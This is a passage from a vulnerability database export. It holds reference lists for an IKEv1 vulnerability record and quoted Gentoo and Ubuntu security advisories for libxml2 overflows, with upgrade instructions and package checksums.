            "url": "http://jvn.jp/niscc/niscc-273756/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/about_secunia_advisories/"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2006/0182"
          },
          {
            "trust": 0.3,
            "url": "http://www.fortinet.com/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/5625/"
          },
          {
            "trust": 0.1,
            "url": "http://www.astaro.org/showflat.php?cat=\u0026number=63958\u0026page=0\u0026view=collapsed\u0026sb=5\u0026o=\u0026fpart=1#63958"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6800/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6802/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/18446/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6801/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6799/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2289/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/90/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/50/"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6102/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/706/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/182/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/56/"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml#software"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/5088/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6101/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2273/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3214/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/59/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/89/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6148/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6010/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6149/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2542/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6124/"
          },
          {
            "trust": 0.1,
            "url": "http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=bltndetail\u0026documentoid=367651\u0026renditionid="
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6125/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6126/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/2576/"
          },
          {
            "trust": 0.1,
            "url": "https://clientweb.clavister.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.clavister.com/support/support_update_isakmp.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6205/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3352/"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/project/showfiles.php?group_id=74601\u0026package_id=74949\u0026release_id=372605"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/mailarchive/forum.php?thread_id=9017454\u0026forum_id=32000"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=372605\u0026group_id=74601"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3104/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6177/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3587/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6175/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6176/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/552/"
          },
          {
            "trust": 0.1,
            "url": "http://securityresponse.symantec.com/avcenter/security/content/2005.11.21.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/876/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "db": "BID",
            "id": "15997"
          },
          {
            "db": "PACKETSTORM",
            "id": "41982"
          },
          {
            "db": "PACKETSTORM",
            "id": "43036"
          },
          {
            "db": "PACKETSTORM",
            "id": "41515"
          },
          {
            "db": "PACKETSTORM",
            "id": "41614"
          },
          {
            "db": "PACKETSTORM",
            "id": "41586"
          },
          {
            "db": "PACKETSTORM",
            "id": "41791"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "db": "BID",
            "id": "15997"
          },
          {
            "db": "PACKETSTORM",
            "id": "41982"
          },
          {
            "db": "PACKETSTORM",
            "id": "43036"
          },
          {
            "db": "PACKETSTORM",
            "id": "41515"
          },
          {
            "db": "PACKETSTORM",
            "id": "41614"
          },
          {
            "db": "PACKETSTORM",
            "id": "41586"
          },
          {
            "db": "PACKETSTORM",
            "id": "41791"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2005-11-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "date": "2005-12-29T00:00:00",
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "date": "2005-12-08T00:00:00",
            "db": "BID",
            "id": "15997"
          },
          {
            "date": "2005-12-01T18:48:38",
            "db": "PACKETSTORM",
            "id": "41982"
          },
          {
            "date": "2006-01-14T05:07:24",
            "db": "PACKETSTORM",
            "id": "43036"
          },
          {
            "date": "2005-11-15T06:02:23",
            "db": "PACKETSTORM",
            "id": "41515"
          },
          {
            "date": "2005-11-19T21:56:12",
            "db": "PACKETSTORM",
            "id": "41614"
          },
          {
            "date": "2005-11-19T21:56:12",
            "db": "PACKETSTORM",
            "id": "41586"
          },
          {
            "date": "2005-11-30T04:03:08",
            "db": "PACKETSTORM",
            "id": "41791"
          },
          {
            "date": "2005-11-22T18:19:46",
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "date": "2005-11-22T18:19:46",
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "date": "2005-12-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          },
          {
            "date": "2005-12-29T11:03:00",
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2006-01-03T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "date": "2011-03-08T00:00:00",
            "db": "VULHUB",
            "id": "VHN-15778"
          },
          {
            "date": "2005-12-08T00:00:00",
            "db": "BID",
            "id": "15997"
          },
          {
            "date": "2005-12-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2005-4570"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Internet Key Exchange (IKE) version 1 implementations",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200512-619"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200809-0566

    Vulnerability from variot - Updated: 2026-03-09 20:56

    Heap-based buffer overflow in the xmlParseAttValueComplex function in parser.c in libxml2 before 2.7.0 allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via a long XML entity name. The 'libxml' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability. The libxml package provides a library of functions that allow users to manipulate XML files, including support for reading, modifying, and writing XML and HTML files. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-06


                                            http://security.gentoo.org/
    

    Severity: Normal Title: libxml2: Multiple vulnerabilities Date: December 02, 2008 Bugs: #234099, #237806, #239346, #245960 ID: 200812-06


    Synopsis

    Multiple vulnerabilities in libxml2 might lead to execution of arbitrary code or Denial of Service.

    Background

    libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project.

    Affected packages

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
    

    1 dev-libs/libxml2 < 2.7.2-r1 >= 2.7.2-r1

    Description

    Multiple vulnerabilities were reported in libxml2:

    • Andreas Solberg reported that libxml2 does not properly detect recursion during entity expansion in an attribute value (CVE-2008-3281).

    • A heap-based buffer overflow has been reported in the xmlParseAttValueComplex() function in parser.c (CVE-2008-3529).

    • Christian Weiske reported that predefined entity definitions in entities are not properly handled (CVE-2008-4409).

    • Drew Yao of Apple Product Security reported an integer overflow in the xmlBufferResize() function that can lead to an infinite loop (CVE-2008-4225).

    • Drew Yao of Apple Product Security reported an integer overflow in the xmlSAX2Characters() function leading to a memory corruption (CVE-2008-4226).

    Impact

    A remote attacker could entice a user or automated system to open a specially crafted XML document with an application using libxml2, possibly resulting in the exeution of arbitrary code or a high CPU and memory consumption.

    Workaround

    There is no known workaround at this time.

    Resolution

    All libxml2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1"
    

    References

    [ 1 ] CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 [ 2 ] CVE-2008-3529 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529 [ 3 ] CVE-2008-4409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409 [ 4 ] CVE-2008-4225 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225 [ 5 ] CVE-2008-4226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200812-06.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-815-1 August 11, 2009 libxml2 vulnerabilities CVE-2008-3529, CVE-2009-2414, CVE-2009-2416 ===========================================================

    A security issue affects the following Ubuntu releases:

    Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04

    This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

    The problem can be corrected by upgrading your system to the following package versions:

    Ubuntu 6.06 LTS: libxml2 2.6.24.dfsg-1ubuntu1.5

    Ubuntu 8.04 LTS: libxml2 2.6.31.dfsg-2ubuntu1.4

    Ubuntu 8.10: libxml2 2.6.32.dfsg-4ubuntu1.2

    Ubuntu 9.04: libxml2 2.6.32.dfsg-5ubuntu4.2

    After a standard system upgrade you need to restart your sessions to effect the necessary changes.

    Details follow:

    It was discovered that libxml2 did not correctly handle root XML document element DTD definitions. (CVE-2009-2414)

    It was discovered that libxml2 did not correctly parse Notation and Enumeration attribute types. (CVE-2009-2416)

    USN-644-1 fixed a vulnerability in libxml2. This advisory provides the corresponding update for Ubuntu 9.04.

    Original advisory details:

    It was discovered that libxml2 did not correctly handle long entity names. (CVE-2008-3529)

    Updated packages for Ubuntu 6.06 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.diff.gz
      Size/MD5:    62776 d89c05d4e7cf575a70f0f9d98db043c0
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.dsc
      Size/MD5:      902 5a6bda5a6cff7f1dd1b9ac5a4a4d3dee
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg.orig.tar.gz
      Size/MD5:  3293814 461eb1bf7f0c845f7ff7d9b1a4c4eac8
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.24.dfsg-1ubuntu1.5_all.deb
      Size/MD5:  1253066 7f0900285bcd5980021afb1187a65882
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.24.dfsg-1ubuntu1.5_all.deb
      Size/MD5:    19366 bdcb84dd5b172486d90babd60f7abe3e
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_amd64.deb
      Size/MD5:   918870 5c542ff6be1ebfe37ed53fb5c42d4f9a
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_amd64.deb
      Size/MD5:   737430 1277b3e55c846153da8612c2b1bd6c05
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_amd64.deb
      Size/MD5:    36698 941d28a2ab8c583df8ac8c4bd6053f7e
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb
      Size/MD5:   753036 159fc7694915d15d86868cbd34ff1ebb
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb
      Size/MD5:   181652 5e66ae52ee397d016840038de0a2f057
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_i386.deb
      Size/MD5:   766190 9afc9a70749f02669713a807ceaf2ad3
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_i386.deb
      Size/MD5:   642032 6e7ac3450d6220b0b5b827483622d145
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_i386.deb
      Size/MD5:    32980 5fc874170294ea6f6c94a690a01dbad7
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb
      Size/MD5:   685138 4a8510c2c2b66f6c55e4155af4c7e091
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb
      Size/MD5:   166422 6cc5c19adb5ccb9db5fec9286790af1a
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_powerpc.deb
      Size/MD5:   905098 dd7b7a8b76af164a73785d7c40be445c
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_powerpc.deb
      Size/MD5:   761238 2f407df0d47072583fdbc6465b744b6a
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_powerpc.deb
      Size/MD5:    37424 c584cfd1c16a16106d10a8d090aaccf0
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb
      Size/MD5:   734090 42f54b7042c391a8326558cdc924fcc2
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb
      Size/MD5:   170808 8f4821f282453c7c516ba36e2c5fadd9
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_sparc.deb
      Size/MD5:   745812 84c50f29ba04c9c815e561e9c9b825ee
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_sparc.deb
      Size/MD5:   703538 3f2e7fbc56bf64aa9631c567852dadfd
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_sparc.deb
      Size/MD5:    34312 540c1cb95cd95eafe94cad690e0c7ae2
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb
      Size/MD5:   716890 41e8303a6e6d3fb335a2fb06b4e1bc7a
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb
      Size/MD5:   174772 567a3fdd900bc9cb34e5f2f668e48851
    

    Updated packages for Ubuntu 8.04 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.diff.gz
      Size/MD5:    66035 c629b5480445cc4380bf3bae181d8484
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.dsc
      Size/MD5:     1072 67e7f23a4d73713a67233d554f6c8b5c
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg.orig.tar.gz
      Size/MD5:  3442959 8498d4e6f284d2f0a01560f089cb5a3e
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.31.dfsg-2ubuntu1.4_all.deb
      Size/MD5:  1302458 9454932b37039a5af38524f7c4c0b294
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb
      Size/MD5:   939490 5c561ccc0fe42d44216631b89b1addf2
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_amd64.deb
      Size/MD5:   754024 1d43d32a7125d4b2ed113c7dbb469bdf
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_amd64.udeb
      Size/MD5:   580472 d2e2babcee294fdd0f202d5d122c0dd2
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_amd64.deb
      Size/MD5:    37052 440a067962c6e1e7ffe17071bb33fd09
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb
      Size/MD5:   832898 b129c03e0971727757567d89a6d32269
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb
      Size/MD5:   872964 86ab686a437dd9ed2b1ea08dbd5d9ba1
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb
      Size/MD5:   297976 8acf0cdf5242fd3e6edd957db9e19c28
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb
      Size/MD5:   904990 88fe3df363f8829fcfb9a0ff42aa4e96
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_i386.deb
      Size/MD5:   676490 641845452580108e68afbd1605af5744
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_i386.udeb
      Size/MD5:   533328 3e0d900bd1898de03a78fd408800d88e
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_i386.deb
      Size/MD5:    34042 2061451c337e1b12f73f9f91125aeda2
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb
      Size/MD5:   786106 664fc7281611ad8b19e5f0b62284878f
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb
      Size/MD5:   796320 1d531f46ab809a0f58ccdcf75f706ea5
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb
      Size/MD5:   262966 d26ec52d81b118a64f13657db427f858
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb
      Size/MD5:   931054 830e464f765c3109497514d96295c932
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_lpia.deb
      Size/MD5:   679546 6f6ee1fe040963315471c2a2a15064d6
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_lpia.udeb
      Size/MD5:   529214 af124b039059f2f24f31c50fc8fbf48f
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_lpia.deb
      Size/MD5:    34488 ef4c4ea4e96d66c6d5c36e2645379915
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb
      Size/MD5:   781436 ae5efc717942777be05db9c550d5ddd5
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb
      Size/MD5:   788580 c16e8d94ecb5f1a14655fc4d40671f97
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb
      Size/MD5:   259630 143a179bfbcff152d9f33c424ea80229
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb
      Size/MD5:   923448 d3ca8a5978632bec93151a892072b5c4
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_powerpc.deb
      Size/MD5:   776284 92d1fb876bb167fccee4e5a6a82e8169
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_powerpc.udeb
      Size/MD5:   564078 9d75d8f965c320fd17dc2c420aa6e325
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_powerpc.deb
      Size/MD5:    42060 8bedb52b8485e7b65b930a39a671cbd8
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb
      Size/MD5:   816678 55d6f855ea9b7b14f2ce449079360f80
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb
      Size/MD5:   841354 b66c89a166c8a92ed136f77e2693249b
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb
      Size/MD5:   285362 adc160daa3848983f4ddb678c3345199
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb
      Size/MD5:   826326 f596d405cff24bfa70d8c2ff81e3439b
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_sparc.deb
      Size/MD5:   719830 b0cb8e2bbbec82604b5a562f3e446f78
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_sparc.udeb
      Size/MD5:   541066 f5796b6b3175b740eb55ab32887c98f1
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_sparc.deb
      Size/MD5:    36190 1e5ae0d677b95e4f5b69c86ab7207c04
    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb
      Size/MD5:   793408 c10a54dbfe118a255b353b59fee0c895
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb
      Size/MD5:   807914 3566e097583445477cad63cd721424f1
    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb
      Size/MD5:   277520 b0c2ed5aafa41ff970a5d8c40a12d02d
    

    Updated packages for Ubuntu 8.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.diff.gz
      Size/MD5:    84498 bc3004e4fd1e98246801b2a5741be0f1
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.dsc
      Size/MD5:     1494 5a25281495f4e6650a45f45a5a8526d2
    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz
      Size/MD5:  3425843 bb11c95674e775b791dab2d15e630fa4
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-4ubuntu1.2_all.deb
      Size/MD5:  1308242 3aa37d0a971702bda21165e2744d3b15
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb
